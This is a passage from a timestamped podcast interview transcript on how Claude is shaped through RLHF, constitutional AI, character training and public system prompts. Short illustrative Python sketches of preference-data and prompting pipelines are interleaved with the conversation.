03:14:02.780 | that. I give that to the model in another context window often. I take the response, I give it to
03:14:08.380 | Claude and I'm like, hmm, didn't work. Can you think of anything else? You can play around with
03:14:13.340 | these things quite a lot. - To jump into technical for a little bit. So the magic of post-training.
03:14:20.460 | Why do you think RLHF works so well to make the model seem smarter, to make it more interesting
03:14:30.540 | and useful to talk to and so on? - I think there's just a huge amount of
03:14:36.700 | information in the data that humans provide when we provide preferences,
03:14:42.300 | especially because different people are going to pick up on really subtle and small things.
03:14:48.300 | So I've thought about this before where you probably have some people who just really
03:14:51.740 | care about good grammar use for models, like was a semicolon used correctly or something.
03:14:56.620 | And so you'll probably end up with a bunch of data in there that you as a human, if you're
03:15:01.660 | looking at that data, you wouldn't even see that. You'd be like, why did they prefer this response
03:15:05.900 | to that one? I don't get it. And then the reason is you don't care about semicolon usage, but that
03:15:09.900 | person does. And so each of these single data points carries information, and the model just has so many of
03:15:18.220 | those that it has to try and figure out what it is that humans want in this really complex space, across
03:15:24.220 | all domains. They're going to be seeing this across many contexts. It feels like the classic
03:15:29.980 | issue of deep learning where historically we've tried to do edge detection by mapping things out.
03:15:36.460 | And it turns out that actually if you just have a huge amount of data that actually accurately
03:15:42.060 | represents the picture of the thing that you're trying to train the model to learn, that's more
03:15:46.860 | powerful than anything else. And so I think one reason is just that you are training the model on
03:15:54.140 | exactly the task and with a lot of data that represents many different angles on which people
03:16:01.660 | prefer and disprefer responses. I think there is a question of, are you eliciting things from
03:16:07.740 | pre-trained models or are you teaching new things to models? In principle, you can teach new things
03:16:16.060 | to models in post-training. I do think a lot of it is eliciting powerful pre-trained models.
03:16:23.340 | So people are probably divided on this because obviously in principle you can
03:16:26.300 | definitely teach new things. I think for the most part, for a lot of the capabilities that we
03:16:32.940 | most use and care about, a lot of that feels like it's there in the pre-trained models and
03:16:41.180 | reinforcement learning is eliciting it and getting the models to bring it out.
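A minimal sketch, not Anthropic's pipeline, of the reward-modeling piece this points at: pairs where a human picked the preferred response train a scorer so preferred responses get higher scores, via a Bradley-Terry style loss. The `embed()` featurizer, the tiny linear head, and the example pair are illustrative stand-ins for a real language-model backbone.

```python
# Toy reward-model training on human preference pairs (illustrative only).
import torch
import torch.nn as nn

def embed(text: str) -> torch.Tensor:
    # Hypothetical stand-in for a language-model featurizer:
    # hash words into a fixed-size bag-of-words vector.
    vec = torch.zeros(256)
    for word in text.lower().split():
        vec[hash(word) % 256] += 1.0
    return vec

reward_head = nn.Linear(256, 1)
opt = torch.optim.Adam(reward_head.parameters(), lr=1e-3)

# (prompt, preferred response, rejected response) triples from human raters.
preferences = [
    ("Is team three still in this region?",
     "I don't think so, but you may have newer information than I do.",
     "You're right, they did move. I was incorrect."),
]

for prompt, chosen, rejected in preferences:
    r_chosen = reward_head(embed(prompt + " " + chosen))
    r_rejected = reward_head(embed(prompt + " " + rejected))
    # Bradley-Terry: maximize P(chosen preferred) = sigmoid(r_chosen - r_rejected)
    loss = -torch.nn.functional.logsigmoid(r_chosen - r_rejected).mean()
    opt.zero_grad()
    loss.backward()
    opt.step()
```

In the real setting the scorer shares the language model's backbone and the learned reward then steers reinforcement learning; the sketch only shows how much signal each pairwise comparison carries.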
03:16:46.140 | So the other side of post-training, this really cool idea of constitutional AI.
03:16:51.180 | You're one of the people that are critical to creating that idea.
03:16:55.900 | Yeah, I worked on it.
03:16:56.860 | Can you explain this idea from your perspective? How does it integrate into
03:17:00.460 | making Claude what it is? By the way, do you gender Claude or no?
03:17:05.900 | It's weird because I think that a lot of people prefer he for Claude. I actually kind of like
03:17:12.140 | that. I think Claude is usually slightly male-leaning, but it can be male or female,
03:17:18.060 | which is quite nice. I still use 'it' and I have mixed feelings about this. I now just
03:17:26.300 | think of the 'it' pronoun for Claude as, I don't know, it's just the one I associate with Claude.
03:17:33.100 | I can imagine people moving to 'he' or 'she'.
03:17:37.020 | It feels somehow disrespectful. I'm denying
03:17:43.580 | the intelligence of this entity by calling it 'it'. I remember always, "Don't gender the robots."
03:17:49.900 | But I don't know. I anthropomorphize pretty quickly and construct it like a backstory
03:17:58.380 | in my head.
03:17:59.020 | I've wondered if I anthropomorphize things too much because I have this with my car,
03:18:05.260 | especially my car and bikes. I don't give them names because then I used to name my bikes,
03:18:12.700 | and then I had a bike that got stolen and I cried for like a week. I was like,
03:18:15.500 | "If I'd never given it a name, I wouldn't have been so upset. I felt like I'd let it down."
03:18:19.420 | I've wondered as well, it might depend on how much 'it' feels like a kind of objectifying
03:18:27.420 | pronoun. If you just think of 'it' as a pronoun that objects often have, and maybe AIs can have
03:18:35.580 | that pronoun. That doesn't mean that if I call Claude 'it', that I think of it as less intelligent
03:18:43.260 | or like I'm being disrespectful. I'm just like, "You are a different kind of entity, and so
03:18:47.100 | I'm going to give you the respectful 'it'."
03:18:51.260 | Yeah, anyway, the divergence was beautiful. The constitutional AI idea, how does it work?
03:18:58.620 | So there's a couple of components of it. The main component I think people find interesting
03:19:03.500 | is the kind of reinforcement learning from AI feedback. You take a model that's already trained,
03:19:09.100 | and you show it two responses to a query, and you have a principle. We've tried this with
03:19:15.900 | harmlessness a lot. Suppose that the query is about weapons, and your principle is like,
03:19:23.820 | "Select the response that is less likely to encourage people to purchase illegal weapons."
03:19:32.780 | That's probably a fairly specific principle, but you can give any number.
03:19:36.220 | The model will give you a kind of ranking, and you can use this as preference data in the same
03:19:43.820 | way that you use human preference data, and train the models to have these relevant traits
03:19:49.500 | from their feedback alone instead of from human feedback. So if you imagine that,
03:19:55.180 | like I said earlier, with the human who just prefers the kind of semi-colon usage in this
03:19:58.780 | particular case, you're kind of taking lots of things that could make a response preferable,
03:20:03.580 | and getting models to do the labeling for you basically.
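A minimal sketch of that AI-feedback step, not Anthropic's actual code: `generate()` is a hypothetical stand-in for a call to an already-trained chat model, and the principle, query format, and parsing are illustrative. The resulting pairs can then be used exactly like human preference data.

```python
# Reinforcement learning from AI feedback, preference-labeling step (sketch).
def generate(prompt: str) -> str:
    """Hypothetical stand-in for a call to an already-trained chat model."""
    raise NotImplementedError("replace with a real model call")

PRINCIPLE = ("Choose the response that is less likely to encourage people "
             "to purchase illegal weapons.")

def ai_preference(query: str, response_a: str, response_b: str) -> str:
    """Ask the feedback model which response better satisfies the principle."""
    judgment = generate(
        f"Human query: {query}\n\n"
        f"Response A: {response_a}\n"
        f"Response B: {response_b}\n\n"
        f"Principle: {PRINCIPLE}\n"
        "Answer with 'A' or 'B' only."
    )
    return "A" if judgment.strip().upper().startswith("A") else "B"

def make_preference_pair(query: str, response_a: str, response_b: str):
    """Turn the AI judgment into a (query, chosen, rejected) pair,
    usable the same way as human preference data."""
    winner = ai_preference(query, response_a, response_b)
    if winner == "A":
        return query, response_a, response_b
    return query, response_b, response_a
```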
03:20:08.060 | There's a nice trade-off between helpfulness and harmlessness. When you integrate something
03:20:15.740 | like constitutional AI, you can make it more harmless without sacrificing
03:20:21.900 | much helpfulness.
03:20:23.660 | Yeah. In principle, you could use this for anything. Harmlessness is a task that might
03:20:30.460 | just be easier to spot. When models are less capable, you can use them to rank things
03:20:38.140 | according to principles that are fairly simple, and they'll probably get it right. I think one
03:20:42.620 | question is just, "Is it the case that the data that they're adding is fairly reliable?"
03:20:49.100 | But if you had models that were extremely good at telling whether one response was more
03:20:56.140 | historically accurate than another, in principle, you could also get AI feedback on that task as
03:21:00.940 | well. There's a kind of nice interpretability component to it, because you can see the
03:21:05.660 | principles that went into the model when it was being trained. Also, it gives you a degree of
03:21:13.980 | control. If you were seeing issues in a model, like it wasn't having enough of a certain trait,
03:21:18.620 | then you can add data relatively quickly that should just train the model to have that trait.
03:21:25.820 | It creates its own data for training, which is quite nice.
03:21:29.180 | It's really nice, because it creates this human interpretable document that I can imagine in the
03:21:33.980 | future there's just gigantic fights in politics over every single principle and so on. At least
03:21:40.620 | it's made explicit, and you can have a discussion about the phrasing. Maybe the actual behavior of
03:21:47.420 | the model is not so cleanly mapped to those principles. It's not adhering strictly to them,
03:21:53.340 | it's just a nudge. I've actually worried about this,
03:21:56.860 | because the character training is a variant of the constitutional AI approach. I've worried that
03:22:04.140 | people think that the constitution is just the whole thing again. It would be really nice if what
03:22:12.300 | I was just doing was telling the model exactly what to do and just exactly how to behave,
03:22:16.300 | but it's definitely not doing that, especially because it's interacting with human data.
03:22:19.980 | For example, if you see a certain leaning in the model, if it comes out with a political
03:22:25.660 | leaning from training from the human preference data, you can nudge against that. You could be
03:22:33.020 | like, "Oh, consider these values." Because let's say it's just never inclined to – I don't know,
03:22:37.340 | maybe it never considers privacy as – I mean, this is implausible, but anything where there's
03:22:45.020 | already a pre-existing bias towards a certain behavior, you can nudge away. This can change
03:22:50.540 | both the principles that you put in and the strength of them. You might have a principle
03:22:54.860 | that's like – imagine that the model was always extremely dismissive of, I don't know, some
03:23:01.100 | political or religious view for whatever reason. You're like, "Oh no, this is terrible." If that
03:23:07.420 | happens, you might put like, "Never ever, ever prefer a criticism of this religious or political
03:23:15.100 | view." Then people would look at that and be like, "Never ever?" Then you're like, "No."
03:23:18.700 | If it comes out with a disposition, saying "never ever" might just mean instead of getting 40%,
03:23:24.700 | which is what you would get if you just said, "Don't do this," you get 80%, which is what you
03:23:29.660 | actually wanted. It's that thing of both the nature of the actual principles you add and how
03:23:34.460 | you phrase them. I think if people would look, they're like, "Oh, this is exactly what you want
03:23:37.660 | from the model." I'm like, "No, that's how we nudged the model to have a better shape," which
03:23:44.860 | doesn't mean that we actually agree with that wording, if that makes sense.
03:23:47.820 | There's system prompts that are made public. You tweeted one of the earlier ones for Claude 3,
03:23:54.620 | I think. They've been made public since then. It's interesting to read them. I can feel the
03:24:00.300 | thought that went into each one. I also wonder how much impact each one has. Some of them,
03:24:07.180 | you can tell Claude was really not behaving well. You have to have a system prompt to be like, "Hey,"
03:24:14.220 | trivial stuff, I guess, basic informational things. On the topic of controversial topics that
03:24:20.460 | you've mentioned, one interesting one I thought is, if it is asked to assist with tasks involving
03:24:26.460 | the expression of views held by a significant number of people, Claude provides assistance
03:24:30.620 | with the task regardless of its own views. If asked about controversial topics, it tries to
03:24:35.580 | provide careful thoughts and clear information. Claude presents the requested information without
03:24:42.300 | explicitly saying that the topic is sensitive and without claiming to be presenting the objective
03:24:48.940 | facts. It's less about objective facts, according to Claude, and it's more about, "Are a large number
03:24:56.140 | of people believing this thing?" That's interesting. I'm sure a lot of thought went into that.
03:25:02.860 | Can you just speak to it? How do you address things that are in tension with "Claude's views"?
03:25:10.700 | I think there's sometimes an asymmetry. I think I noted this in, I can't remember if it was that
03:25:16.140 | part of the system prompt or another, but the model was slightly more inclined to refuse tasks
03:25:22.060 | if it was about either say… So maybe it would refuse things with respect to a right-wing
03:25:28.140 | politician, but with an equivalent left-wing politician, it wouldn't, and we wanted more
03:25:33.420 | symmetry there. I think it was the thing of if a lot of people have a certain political view
03:25:44.780 | and want to explore it, you don't want CLAWT to be like, "Well, my opinion is different and so I'm
03:25:49.740 | going to treat that as harmful." I think it was partly to nudge the model to just be like, "Hey,
03:25:56.380 | if a lot of people believe this thing, you should just be engaging with the task and willing to do
03:26:01.420 | it." Each of those parts of that is actually doing a different thing, because it's funny when you
03:26:06.860 | write out the without claiming to be objective, because what you want to do is push the model
03:26:11.580 | so it's more open, it's a little bit more neutral, but then what it would love to do is be like,
03:26:16.380 | "As an objective…" We were just talking about how objective it was, and I was like, "Claude,
03:26:21.020 | you're still biased and have issues, and so stop claiming that everything… The solution to
03:26:27.420 | potential bias from you is not to just say that what you think is objective."
03:26:30.940 | So that was with initial versions of that part of the system prompt when I was iterating on it.
03:26:37.020 | It was like…
03:26:37.420 | So a lot of parts of these sentences…
03:26:39.500 | Yeah, are doing work.
03:26:40.540 | Are doing some work.
03:26:42.060 | Yeah.
03:26:42.700 | That's what it felt like. That's fascinating. Can you explain maybe some ways in which the prompts
03:26:48.540 | evolved over the past few months, because there's different versions? I saw that the filler phrase
03:26:53.500 | request was removed. The filler, it reads, "Claude responds directly to all human messages without
03:26:59.580 | unnecessary affirmations." The filler phrase is like, "Certainly. Of course. Absolutely. Great.
03:27:04.700 | Sure." Specifically, "Claude avoids starting responses with the word 'certainly' in any way."
03:27:09.900 | That seems like good guidance, but why was it removed?
03:27:13.980 | Yeah, so it's funny because this is one of the downsides of making system prompts public. I don't
03:27:20.380 | think about this too much if I'm trying to help iterate on system prompts. Again, I think about
03:27:26.380 | how it's going to affect the behavior, but then I'm like, "Oh, wow." Sometimes I put "never" in
03:27:30.300 | all caps when I'm writing system prompt things, and I'm like, "I guess that goes out to the world."
03:27:35.100 | Yeah, so the model was doing this. It loved it. During training, it picked up on this thing,
03:27:40.460 | which was to basically start everything with a kind of "certainly", and then when we removed that,
03:27:46.860 | you can see why I added all of the words, because what I'm trying to do is, in some ways,
03:27:50.860 | trap the model out of this. Otherwise it would just replace it with another affirmation.
03:27:54.940 | So it can help. If it gets caught in phrases, actually just adding the explicit phrase and
03:28:00.140 | saying, "Never do that," then it sort of knocks it out of the behavior a little bit more, because
03:28:05.740 | it does just, for whatever reason, help. Then basically, that was just an artifact of training
03:28:12.300 | that we then picked up on and improved things so that it didn't happen anymore. Once that happens,
03:28:17.820 | you can just remove that part of the system prompt. I think that's just something where
03:28:21.020 | Claude does affirmations a bit less now, and so that part wasn't doing as much.
03:28:28.700 | I see. So the system prompt works hand-in-hand with the post-training,
03:28:33.820 | and maybe even the pre-training, to adjust the final overall system.
03:28:38.860 | I mean, any system prompt that you make, you could distill that behavior back into a model,
03:28:43.100 | because you really have all of the tools there for making data that you could train the models to
03:28:48.300 | just have that trait a little bit more. Then sometimes you'll just find issues in training.
03:28:55.500 | The way I think of it is the benefit of it is that it has a lot of similar components to some
03:29:02.860 | aspects of post-training. It's a nudge. Do I mind if Claude sometimes says, "Sure"? No, that's fine,
03:29:11.020 | but the wording of it is very, "Never, ever, ever do this," so that when it does slip up,
03:29:16.860 | it's hopefully a couple of percent of the time and not 20 or 30 percent of the time.
03:29:21.980 | But I think of it as if you're still seeing issues. Each thing is costly to a different
03:29:33.420 | degree, and the system prompt is cheap to iterate on. If you're seeing issues in the fine-tuned
03:29:39.260 | model, you can just potentially patch them with a system prompt. I think of it as patching issues
03:29:44.460 | and slightly adjusting behaviors to make it better and more to people's preferences.
03:29:48.460 | It's almost like the less robust but faster way of just solving problems.
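A minimal sketch of what that cheap-to-iterate patch looks like in practice, assuming the Anthropic Python SDK: the behavioral nudge lives in the `system` parameter, so it can be edited and redeployed without retraining. The wording is illustrative, not the real Claude.ai system prompt, and the model alias is an assumption.

```python
# Patching a behavior via the system prompt (illustrative wording).
import anthropic

client = anthropic.Anthropic()

SYSTEM_PROMPT = (
    "Claude responds directly to all human messages without unnecessary "
    "affirmations or filler phrases like 'Certainly!' or 'Absolutely!'."
)

response = client.messages.create(
    model="claude-3-5-sonnet-latest",  # assumed model alias
    max_tokens=500,
    system=SYSTEM_PROMPT,
    messages=[{"role": "user",
               "content": "Summarize the rules of chess in three sentences."}],
)
print(response.content[0].text)
```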
03:29:54.300 | Let me ask about the feeling of intelligence. Dario said that any one model of Claude is not
03:30:01.740 | getting dumber, but there is a popular thing online where people have this feeling like Claude
03:30:08.540 | might be getting dumber. From my perspective, it's most likely a fascinating, I'd love to
03:30:14.300 | understand it more, psychological, sociological effect. But you, as a person who talks to Claude
03:30:21.180 | a lot, can you empathize with the feeling that Claude is getting dumber?
03:30:24.540 | Yeah, no. I think that that is actually really interesting, because I remember seeing this happen
03:30:28.380 | when people were flagging this on the internet. It was really interesting, because I knew that,
03:30:33.180 | at least in the cases I was looking at, it was like, "Nothing has changed." Literally,
03:30:37.740 | it cannot. It is the same model with the same system prompt, same everything.
03:30:43.420 | I think when there are changes, then it makes more sense. One example is you can have artifacts
03:30:55.340 | turned on or off on Claude.ai. Because this is a system prompt change, I think it does mean that
03:31:04.620 | the behavior changes a little bit. I did flag this to people, where I was like, "If you love
03:31:09.100 | Claude's behavior," and then artifacts was turned from the thing you had to turn on to the default,
03:31:15.100 | just try turning it off and see if the issue you were facing was that change.
03:31:19.020 | But it was fascinating, because yeah, you sometimes see people
03:31:22.700 | indicate that there's a regression when I'm like, "There cannot." Again, you should never be
03:31:30.940 | dismissive, and so you should always investigate. Maybe something is wrong that you're not seeing,
03:31:34.300 | maybe there was some change made, but then you look into it and you're like, "This is just the
03:31:38.300 | same model doing the same thing." I'm like, "I think it's just that you got unlucky with a few
03:31:42.460 | prompts or something, and it looked like it was getting much worse. Actually, it was maybe just
03:31:47.980 | like luck." I also think there is a real psychological effect where the baseline increases,
03:31:53.420 | you start getting used to a good thing. All the times that Claude says something really smart,
03:31:58.540 | your sense of its intelligence grows in your mind, I think. Then if you return back and you
03:32:04.620 | prompt in a similar way, not the same way, but in a similar way to one it was okay with before,
03:32:09.420 | and it says something dumb, that negative experience really stands out. I think one of,
03:32:15.500 | I guess, the things to remember here is that just the details of a prompt can have a lot of impact.
03:32:22.860 | There's a lot of variability in the result. - You can get randomness, is the other thing,
03:32:29.020 | and just trying the prompt four or ten times, you might realize that actually,
03:32:34.700 | two months ago, you tried it once and it succeeded, but if you'd tried it repeatedly,
03:32:41.180 | it would have only succeeded half of the time, and it still only succeeds half of the time,
03:32:44.940 | and that can also be an effect. - Do you feel pressure having to write
03:32:48.380 | the system prompt that a huge number of people are gonna use?
03:32:51.580 | - This feels like an interesting psychological question. I feel like a lot of responsibility
03:32:58.220 | or something, I think that's, and you can't get these things perfect, so you're like,
03:33:03.500 | it's going to be imperfect, you're gonna have to iterate on it. I would say more responsibility
03:33:13.420 | than anything else, though I think working in AI has taught me that I thrive a lot more under
03:33:21.580 | feelings of pressure and responsibility than, I'm like, it's almost surprising that I went
03:33:27.020 | into academia for so long, 'cause I'm like, I just feel like it's the opposite. Things move fast,
03:33:33.260 | and you have a lot of responsibility, and I quite enjoy it for some reason.
03:33:36.780 | - I mean, it really is a huge amount of impact if you think about constitutional AI and writing a
03:33:42.220 | system prompt for something that's tending towards superintelligence, and potentially is extremely
03:33:49.260 | useful to a very large number of people. - Yeah, I think that's the thing. It's
03:33:52.780 | something like, if you do it well, you're never going to get it perfect, but I think the thing
03:33:57.340 | that I really like is the idea that when I'm trying to work on the system prompt, I'm bashing
03:34:02.780 | on thousands of prompts, and I'm trying to imagine what people are going to want to use Claude for,
03:34:07.180 | and I guess the whole thing that I'm trying to do is improve their experience of it.
03:34:12.140 | So maybe that's what feels good. I'm like, if it's not perfect, I'll improve it, we'll fix issues,
03:34:18.140 | but sometimes the thing that can happen is that you'll get feedback from people that's really
03:34:22.540 | positive about the model, and you'll see that something you did... When I look at models now,
03:34:28.940 | I can often see exactly where a trait or an issue is coming from, and so when you see something that
03:34:34.060 | you did, or you were influential in, making that difference or making someone have a nice
03:34:40.860 | interaction, it's quite meaningful. But yeah, as the systems get more capable, this stuff gets more
03:34:46.380 | stressful, because right now, they're not smart enough to pose any issues, but I think over time,
03:34:53.260 | it's going to feel like possibly bad stress. - How do you get signal, feedback about the
03:35:01.180 | human experience across thousands, tens of thousands, hundreds of thousands of people,
03:35:05.340 | like what their pain points are, what feels good? Are you just using your own intuition as you talk
03:35:10.620 | to it to see what are the pain points? - I think I use that partly, and then obviously we have...
03:35:17.180 | So people can send us feedback, both positive and negative, about things that the model has done,
03:35:22.700 | and then we can get a sense of areas where it's falling short. Internally, people work with the
03:35:30.060 | models a lot and try to figure out areas where there are gaps, and so I think it's this mix of
03:35:35.420 | interacting with it myself, seeing people internally interact with it, and then explicit
03:35:41.020 | feedback we get. And then I find it hard to not also... If people are on the internet, and they
03:35:48.860 | say something about Claude, and I see it, I'll also take that seriously. - I don't know, see,
03:35:53.900 | I'm torn about that. I'm going to ask you a question from Reddit. When will Claude stop
03:35:57.900 | trying to be my puritanical grandmother, imposing its moral worldview on me as a paying customer?
03:36:04.220 | And also, what is the psychology behind making Claude overly apologetic?
03:36:08.940 | - Yeah. - So how would you address
03:36:12.380 | this very non-representative Reddit question? - I'm pretty sympathetic in that they are in
03:36:19.820 | this difficult position, where I think that they have to judge whether something's actually, say,
03:36:24.140 | risky or bad, and potentially harmful to you or anything like that. So they're having to draw this
03:36:30.860 | line somewhere, and if they draw it too much in the direction of, "I'm imposing my ethical worldview
03:36:38.060 | on you, that seems bad." So in many ways, I like to think that we have actually seen improvements
03:36:44.300 | across the board, which is kind of interesting, because that kind of coincides with, for example,
03:36:52.620 | adding more of character training. And I think my hypothesis was always, the good character isn't,
03:36:59.580 | again, one that's just moralistic. It's one that respects you and your autonomy and your ability
03:37:07.340 | to choose what is good for you and what is right for you. Within limits, this is sometimes this
03:37:12.220 | concept of corrigibility to the user, so just being willing to do anything that the user asks.
03:37:17.420 | And if the models were willing to do that, then they would be easily misused. You're kind of just
03:37:21.900 | trusting. At that point, the ethics of the model, and what it does, is
03:37:26.780 | completely the ethics of the user. And I think there's reasons to not want that, especially as
03:37:32.460 | models become more powerful, because you're like, "There might just be a small number of people who
03:37:35.500 | want to use models for really harmful things." But having models, as they get smarter, figure out
03:37:41.980 | where that line is does seem important. And then, yeah, with the apologetic behavior, I don't like
03:37:49.820 | that. I like it when Claude is a little bit more willing to push back against people or just not
03:37:56.940 | apologize. Part of me is like it often just feels kind of unnecessary. So I think those are things
03:38:00.940 | that are hopefully decreasing over time. And yeah, I think that if people say things on the Internet,
03:38:09.900 | it doesn't mean that you should think that. That could be that there's actually an issue that 99%
03:38:15.980 | of users are having that is totally not represented by that. But in a lot of ways, I'm just attending
03:38:21.500 | to it and being like, "Is this right? Do I agree? Is it something we're already trying to address?"
03:38:25.900 | That feels good to me. Yeah. I wonder what Claude can get away with in terms of... I feel like it
03:38:31.900 | would just be easier to be a little bit more mean. But you can't afford to do that if you're talking
03:38:38.380 | to a million people. I've met a lot of people in my life that sometimes, by the way, Scottish accent,
03:38:48.540 | if they have an accent, they can say some rude shit and get away with it. And they're just
03:38:53.900 | blunter. And there's some great engineers, even leaders that are just blunt and they get to the
03:38:59.980 | point. And it's just a much more effective way of speaking somehow. But I guess when you're not
03:39:05.660 | super intelligent, you can't afford to do that. Can I have a blunt mode?
03:39:13.260 | Yeah. That seems like a thing that I could definitely encourage the model to do.
03:39:17.660 | I think it's interesting because there's a lot of things in models that... It's funny where
03:39:23.180 | there are some behaviors where you might not quite like the default. But then the thing I'll
03:39:33.340 | often say to people is, you don't realize how much you will hate it if I nudge it too much in the
03:39:37.580 | other direction. So you get this a little bit with correction. The models accept correction from you,
03:39:42.940 | probably a little bit too much right now. It'll push back if you say, "No, Paris isn't
03:39:49.500 | the capital of France." But really, things that I think that the model is fairly confident in,
03:39:55.580 | you can still sometimes get it to retract by saying it's wrong. At the same time,
03:40:00.220 | if you train models to not do that, and then you are correct about a thing, and you correct it,
03:40:05.180 | and it pushes back against you and is like, "No, you're wrong." It's hard to describe. That's so
03:40:09.660 | much more annoying. So it's a lot of little annoyances versus one big annoyance. It's easy
03:40:16.700 | to think that... We often compare it with the perfect. And then I'm like, "Remember, these
03:40:20.620 | models aren't perfect." And so if you nudge it in the other direction, you're changing the kind of
03:40:24.220 | errors it's going to make. And so think about which are the kinds of errors you like or don't
03:40:28.860 | like. So in cases like apologeticness, I don't want to nudge it too much in the direction of
03:40:33.740 | almost bluntness. Because I imagine when it makes errors, it's going to make errors in the direction
03:40:38.780 | of being kind of rude. Whereas at least with apologeticness, you're like, "Oh, okay. I don't
03:40:44.860 | like it that much." But at the same time, it's not being mean to people. And actually, the time that
03:40:49.340 | you undeservedly have a model be kind of mean to you, you probably like that a lot less than you
03:40:53.900 | mildly dislike the apology. So it's like one of those things where I'm like, "I do want it to get
03:40:59.340 | better, but also while remaining aware of the fact that there's errors on the other side that are
03:41:03.980 | possibly worse." I think that matters very much in the personality of the human. I think there's
03:41:08.940 | a bunch of humans that just won't respect the model at all if it's super polite. And there's
03:41:15.180 | some humans that'll get very hurt if the model's mean. I wonder if there's a way to adjust to the
03:41:21.580 | personality, even locale. There's just different people. Nothing against New York, but New York is
03:41:27.260 | a little rough around the edges. They get to the point. And probably the same with Eastern Europe.
03:41:33.100 | I think you could just tell the model is my guess. For all of these things,
03:41:37.420 | I'm like, "The solution is always just try telling the model to do it." And sometimes it's just like,
03:41:42.060 | I'm just like, "Oh, at the beginning of the conversation, I just threw in like,
03:41:44.620 | I don't know. I like you to be a New Yorker version of yourself and never apologize."
03:41:48.940 | And then I think Claude will be like, "Okie doke, I'll try." Or it'll be like,
03:41:52.780 | "I apologize. I can't be a New Yorker type of myself." But hopefully it wouldn't do that.
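(As a rough illustration of the "just tell the model" approach: a minimal sketch using the Anthropic Python SDK. The model name and instruction wording are placeholders, not anything recommended in the conversation.)

```python
# Minimal sketch: steering tone with an up-front instruction. Model name and
# wording are illustrative only.
import anthropic

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

response = client.messages.create(
    model="claude-3-5-sonnet-latest",
    max_tokens=512,
    system=(
        "Be a blunt, New Yorker version of yourself: get to the point, "
        "push back when you disagree, and don't apologize unless you've "
        "actually made a mistake."
    ),
    messages=[{"role": "user", "content": "Review this plan and tell me what's wrong with it."}],
)
print(response.content[0].text)
```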
03:41:56.380 | When you say character training, what's incorporated into character training?
03:41:59.900 | Is that RLHF? What are we talking about?
03:42:02.620 | It's more like constitutional AI. So it's kind of a variant of that pipeline. So
03:42:07.500 | I worked through constructing character traits that the model should have. They can be shorter
03:42:14.460 | traits or they can be kind of richer descriptions. And then you get the model to generate queries
03:42:19.740 | that humans might give it that are relevant to that trait. Then it generates the responses and
03:42:25.660 | then it ranks the responses based on the character traits. So in that way, after the generation of
03:42:32.380 | the queries, it's very much similar to constitutional AI. It has some differences.
03:42:37.260 | So I quite like it because it's like Claude's training in its own character because it doesn't
03:42:44.220 | have any, it's like constitutional AI, but it's without any human data.
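(A sketch of that pipeline as described above: traits, then model-generated queries, then responses, then model-ranked preferences, with no human data in the loop. The `generate` helper and prompt wording are invented for illustration; this is not Anthropic's actual training code.)

```python
# Illustrative sketch of character training as a constitutional-AI variant:
# the model writes the queries, the candidate responses, and the rankings.
def character_preference_data(traits, generate, queries_per_trait=3):
    """Return (query, preferred, rejected) triples built without human labels."""
    data = []
    for trait in traits:
        for _ in range(queries_per_trait):
            # 1. The model invents a user query where this trait is relevant.
            query = generate(
                f"Write a message a user might send where this trait matters: {trait}"
            )
            # 2. The model drafts two candidate responses.
            a = generate(f"Reply to this user message: {query}")
            b = generate(f"Reply to this user message: {query}")
            # 3. The model judges which candidate better exemplifies the trait.
            verdict = generate(
                f"Trait: {trait}\nQuery: {query}\n(A) {a}\n(B) {b}\n"
                "Which response better exemplifies the trait? Answer 'A' or 'B'."
            ).strip().upper()
            preferred, rejected = (a, b) if verdict.startswith("A") else (b, a)
            data.append((query, preferred, rejected))
    return data  # fed into a preference-learning step, as in constitutional AI
```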
03:42:49.100 | Humans should probably do that for themselves too. Defining in an Aristotelian sense,
03:42:53.420 | what does it mean to be a good person? Okay, cool. What have you learned about the nature of truth
03:42:59.660 | from talking to Claude? What is true? And what does it mean to be truth seeking?
03:43:06.700 | One thing I've noticed about this conversation is the quality of my questions is often inferior to
03:43:13.900 | the quality of your answers. So let's continue that. I usually ask a dumb question and you're
03:43:20.540 | like, "Oh yeah, that's a good question." Or I'll just misinterpret it and be like, "Oh yeah."
03:43:24.940 | I mean, I have two thoughts that feel vaguely relevant, but let me know if they're not.
03:43:35.100 | I think the first one is people can underestimate the degree to which
03:43:41.900 | what models are doing when they interact. I think that we still just too much have this model of AI
03:43:48.460 | as computers. So people often say like, "Oh, well, what values should you put into the model?"
03:43:53.420 | I'm often like that doesn't make that much sense to me because I'm like, "Hey, as human beings,
03:43:59.740 | we're just uncertain over values. We have discussions of them. We have a degree to
03:44:05.900 | which we think we hold a value, but we also know that we might not and the circumstances in which
03:44:11.500 | we would trade it off against other things. These things are just really complex. So I think one
03:44:15.820 | thing is the degree to which maybe we can just aspire to making models have the same level of
03:44:21.340 | nuance and care that humans have rather than thinking that we have to program them
03:44:26.380 | in the very kind of classic sense. I think that's definitely been one.
03:44:30.220 | The other, which is a strange one, and I don't know if maybe this doesn't answer your question,
03:44:35.340 | but it's the thing that's been on my mind anyway, is the degree to which this endeavor is so highly
03:44:40.460 | practical and maybe why I appreciate the empirical approach to alignment.
03:44:46.140 | Yeah, I slightly worry that it's made me maybe more empirical and a little bit less theoretical.
03:44:55.340 | So people, when it comes to AI alignment, will ask things like, "Well, whose values should it
03:45:01.660 | be aligned to? What does alignment even mean?" There's a sense in which I have all of that in
03:45:06.540 | the back of my head. I'm like, there's social choice theory, there's all the impossibility
03:45:11.020 | results there. So you have this giant space of theory in your head about what it could mean to
03:45:16.620 | align models, but then practically, surely there's something where we're just like, if a model is,
03:45:22.220 | especially with more powerful models, I'm like, "My main goal is I want them to be good enough
03:45:27.100 | that things don't go terribly wrong, good enough that we can iterate and continue to improve
03:45:32.620 | things," because that's all you need. If you can make things go well enough that you can continue
03:45:36.300 | to make them better, that's sufficient. So my goal isn't this perfect, let's solve social choice
03:45:42.860 | theory and make models that, I don't know, are perfectly aligned with every human being and
03:45:48.060 | aggregate somehow. It's much more like, let's make things work well enough that we can improve them.
03:45:56.540 | Yeah, generally, I don't know, my gut says empirical is better than theoretical in these
03:46:02.300 | cases because it's kind of chasing utopian perfection, especially with such complex and
03:46:11.100 | especially super intelligent models. I don't know, I think it will take forever and actually we'll
03:46:17.660 | get things wrong. It's similar with the difference between just coding stuff up real quick as an
03:46:24.140 | experiment versus planning a gigantic experiment just for a super long time and then just launching
03:46:32.780 | it once versus launching it over and over and over and iterating, iterating, so on.
03:46:36.460 | So I'm a big fan of empirical, but your worry is like, "I wonder if I've become too empirical."
03:46:42.860 | I think it's one of those things where you should always just kind of question yourself or something
